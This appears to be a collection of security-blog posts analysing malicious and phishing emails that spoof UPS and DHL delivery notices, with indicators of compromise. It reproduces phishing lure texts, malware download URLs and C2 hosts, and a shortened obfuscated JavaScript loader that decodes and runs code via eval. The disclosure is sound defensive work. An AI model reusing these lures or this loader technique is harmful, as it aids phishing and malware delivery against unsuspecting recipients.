Fake email with subject “UPS Delivery Notification Tracking Number” contains malicious .doc attachment


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “UPS Delivery Notification Tracking Number : XCBMXDI508XCBMXDI866″ (number and letter combination may vary).

This email is send from the spoofed address “UPS Quantum View <auto-notify@ups.com>” and has the following body:

Package delivery confirmation invoice XCBMXDI508XCBMXDI866

Thank you,
United Parcel Service

*** This is an automatically generated email, please do not reply ***
© 2013 United Parcel Service. UPS

The attached ZIP file has the name invoiceU6GCMXGLL2O0N7QYDZ.doc and is 277 kB large file.

Furthermore, the tracking number in the email has an embedded URL that leads to a host where the malicious .doc can be downloaded from: hxxp://customer.appmys-ups.com/IaPk7PC5bZ/customer.php?h=cHVyY2hhc2luZ0BnaWxiby5iZQ0K

The trojan is known as EXP/CVE-2012-0158.AQ.1, Exploit.CVE-2012-0158.Gen, Exploit.CVE-2012-0158.Gen (B), Exploit.Win32.CVE-2012-0158.aq, Troj/DocDrop-AT, Trojan.Mdropper or TROJ_GEN.F47V1105.

At the time of writing, 13 of the 47 AV engines did detect the trojan at Virus Total.

Virus Total permalink and SHA256: ccf7fed174dc9864c810d1c53b1ba7dfedede41cc9fd2ec82d85ec865ca67db8.
Malwr permalink and SHA256: ccf7fed174dc9864c810d1c53b1ba7dfedede41cc9fd2ec82d85ec865ca67db8.

New fake emails “UPS Delivery Notification Tracking Number” combines 2 techniques to infect a computer


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “UPS Delivery Notification Tracking Number:E76TI8Q77G9OGH2YMB” (tracking number may vary with each message) that combines 2 techniques to infect an computer.

The 1st technique is by just including an .exe as attachment but the 2nd technique is started up by opening the attached HTML page. This page will allow the computer user to install a missing browser plug in.

The email is send from the spoofed address “UPS Quantum View <auto-notify@ups.com>” and has the following body:

You have attached the invoice for your package delivery.

Thank you,
United Parcel Service

*** This is an automatically generated email, please do not reply ***

The attached .exe file has the name invoiceE76TI8Q77G9OGH2YMB.PDF.exe (letter/number combination may vary with each message).

The attached HTML file has the name invoiceE76TI8Q77G9OGH2YMB.html (letter/number combination may vary with each message).

Let’s start with the attched .exe file first. The trojan is known as Win32/TrojanDownloader.Onkods.G, Trojan-Spy.Zbot or TROJ_GEN.F0D1H0ZHM13.

At the time of writing, 5 of the 46 AV engines did detect the trojan at Virus Total.

Virus Total permalink and SHA256: 3600343e88ed906ba83dd123c226b0ab0878d54c88983d3a7e4a0bbf9a1d957c.

The 2nd technique exists out of the HTML file that needs to be opened. When opening this HTML file you will get the following screen:

The integrated URL leads to the following screen were the message to install an necessary plug in is showed to the computer user. When doing so, the download of the file JavaJREInstaller.exe is executed.

After the fake download and installation, a new screen is shown where you can fill in the tracking number of the parcel.

But doing so will only generated the following on screen message.

The trojan JavaJREInstaller.exe is known as Trojan/Win32.Fareit, Trojan.PWS.Panda.2977, Win32/Spy.Zbot.AAO, W32/Kryptik.FA!tr, Trojan-Spy.Win32.Zbot.otpl, Artemis!00CE434CF737, Heur.Agent/Gen-WhiteBox, Suspicious.Cloud.5 or Trojan.Win32.ZAccess.bnc (v) and is known to download and request files over the internet.

The process vymeu.exe is created on an infected machine.

Several Windows registry changes will be executed and the trojan can establish connection with the host davs.microdnsz.com on port 80.

At the time of writing, 11 of the 46 AV engines did detect the trojan at Virus Total.

Virus Total permalink and SHA256: 49608f98944623321de3a8a46fa1e6f90926b6b1a51c9edd173ff1eac669705c.

Phishing emails regarding UPS parcel: UPS: Tracking Number Notification


Usually we intercept emails regarding an fake UPS tracking or delivery issue with viruses and trojans attached at MX Lab, http://www.mxlab.eu, but today, we intercepted some phishing emails regarding “UPS parcel”.

The email is sent from the spoofed address “United Parcel Service <powerhost.giv@ups.com>”, listens to the subject “UPS: Tracking Number Notification” and has the following body:

Dear Customer,

Your Parcel has been returned to the UPS office nearest to you.
The reason for the return is as a result of incorrect delivery address information.
Kindly click on the below link to update us with your Mobile Number and in less than (42 hours) an agent will contact you on phone to correct your delivery address to enable delivery of parcel.

To update us with your Mobile Number, please Click Here and enter the below tracking number of Parcel.

Tracking # ( 1Z9575R2P297341747 )

Note: Ensure you enter your correct email information and Mobile Number to enable us reach you on phone.

UPS Logistic Service.
*******************************
Copyright © 1994-2012 United Parcel Service of America, Inc. All rights reserved

The first URL, hxxp://www.simonkagyorgy.hu/wp-content/uploads/2012/02/txt.htm, and is used for redirection to hxxp://www.sarperkara.com/wp-includes/images/crystal/www.ups.com/one-to-one/ where the phishing begins with what appears to be a genuine UPS tracking page.

The next screens asks for your email address, password from your UPS account and phone number after filling in the tracking details.

UPS Delivery Notification, Tracking Number emails with attached HTML document lead to malware


MX Lab, http://www.mxlab.eu, intercepted a few samples by  email with the subject “UPS Delivery Notification, Tracking Number 3A4078A852ED6A84″ with ah HTML document attached with the name invoice3A4078A852ED6A84.html that leads to malware.

The email is send from the spoofed address “UPS Quantum View <auto-notify@ups.com>” and has the following body:

You have attached the invoice for your package delivery.

Thank you,
United Parcel Service

*** This is an automatically generated email, please do not reply ***

The attached HTML has the file name invoice3A4078A852ED6A84.html. Once opened in a browser you will get the following on your screen:

The first URL leads to hxxp://www3apps-myups.com/main.php?page=3a4078a852ed6a84 and will take you to a web site page that contains an obfuscated Javascript (code is shortened):

<html><body>
<b style=”display:none;” id=”zaq”>118,129,117,135,127,119,____[CODE CUT_BY_MXLAB]____,59,77,143,133,130,126,66,58,59,77</b><script>
e=window["ev"+"a"+"l"];
md=”a”;
a=document.getElementById(“zaq”).innerHTML["spli"+"t"](“,”);
</script><script>
s=””;
try{hsdfgbreg=prototype;}catch(asgdshg){try{sadfsd=document.createElement(“dd”);sadfsd.appendChild(“”+sadfsd);}catch(gewher){
for(i=0;i<a.length;i++){
s+=String.fromCharCode(a[i]-18);
}
e(s);
}}
</script></body></html>

The web page shows the following in Firefox on Mac:

The second URL leads to hxxp://track.www3apps-myups.com/invoice3A4078A852ED6A84.JPG.exe and this will download the file invoice3A4078A852ED6A84.JPG.exe.

The trojan is known as Gen:Variant.Kazy.73569, W32/Kryptik.AB!tr, PWS-Zbot.gen.hv or VirTool:Win32/Obfuscator.XI.

At the time of writing, only 6 of the 42 AV engines did detect the trojan at Virus Total.

Virus Total permalink and SHA256: 3d32e5470e02df80ebcbcd4f6d87f2c4a9163e908e8d867aa47c217268ebc310.

New Bredolab trojan variants in DHL and UPS tracking emails


MX Lab intercepted several email messages with new Bredolab trojan variants in the traditional style: emails regarding the tracking of a parcel. We noticed new campaigns using the DHL and UPS tracking style. We will cover them both in this article at the same time.

The trojan is known as Trojan.Win32.Bredolab, Trojan-Downloader:W32/Bredolab.WI or TrojanDownloader:Win32/Bredolab.AB.

UPS Tracking Number

The message comes from the spoofed address UPS Manager *** <services@ups.com> (*** stands for a random firstname lastname format). The subject is UPS Tracking Number 42163829 (number may vary with each email). The body of the email:

Dear customer!

The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address.

You may pickup the parcel at our post office personaly.

Please attention!
The shipping label is attached to this e-mail.
Print this label to get this package at our post office.

Please do not reply to this e-mail, it is an unmonitored mailbox!

Thank you,
United Parcel Service.

The email contains the archive file UPS_invoice _Nr4593.zip, where the number matches the number in the subject. Extracted the executable UPS_invoice _Nr4593.exe is present with a file size of 68kB.

The trojan will create the following files on the system:

%Profiles%\LocalService\Application Data\mvhgkr.dat
%AppData%\avdrn.dat
%DesktopDir%\Internet Security 2010.lnk
%StartMenu%\Internet Security 2010.lnk
%Programs%\Startup\rarype32.exe
%ProgramFiles%\InternetSecurity2010\IS2010.exe
%System%\41.exe
%System%\helper32.dll
%System%\smss32.exe
%System%\winlogon32.exe
%System%\warning.html

There were new processes created in the system:

%System%\smss32.exe
%ProgramFiles%\internetsecurity2010\is2010.exe

Various registry settings will be changed while the port 1054 on TCP is open for the service smss32.exe (%System%\smss32.exe). Connections to remote host are established: 193.104.153.30 on port 80 and to 193.104.94.5 op port 4455.

The data identified by the following URLs was then requested from the remote web server:

* http://downloadavr40.com/loads.php?code=0001384
* http://downloadavr40.com/dfghfghgfj.dll
* http://downloadavr40.com/cgi-bin/download.pl?code=0001384
* http://testavrdown.com/cgi-bin/get.pl?l=0001384

Virus Total permlink and MD5: 28d798d6021e600101ba68ea87345656. At the time of writing this article, only 10 of the 41 AV engines did detect the trojan variant.

DHL Tracking Number

The email comes from the spoofed address Support *** <services@dhl.com> (*** stands for a random firstname lastname format).

Possible subject formats are:

DHL Delivery Problem NR 98545
DHL International. Get your parcel NR.5269
DHL Customer Services. Get your parcel NR.0961
DHL Express Services. Get your parcel NR.6493
DHL Office. Get your parcel NR.6366
DHL Tracking Number 40834372048

The body of the email:

Hello!

The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address.

You may pickup the parcel at our post office personaly.

Please attention!
The shipping label is attached to this e-mail.
Print this label to get this package at our post office.

Please do not reply to this e-mail, it is an unmonitored mailbox!

Thank you,
DHL Express Services.

The email contains the archive file DHL_label_Nr2387.zip. Extracted the executable DHL_label_Nr2387.exe is present with a file size of 68kB. The numbers in the filename may vary.

Following files are created on the system:

%AppData%\avdrn.dat
%Programs%\Startup\rarype32.exe

Virus Total permlink and MD5: 7c874b52eee7196ef96dc8710b957033.

Follow

Get every new post delivered to your Inbox.

Join 304 other followers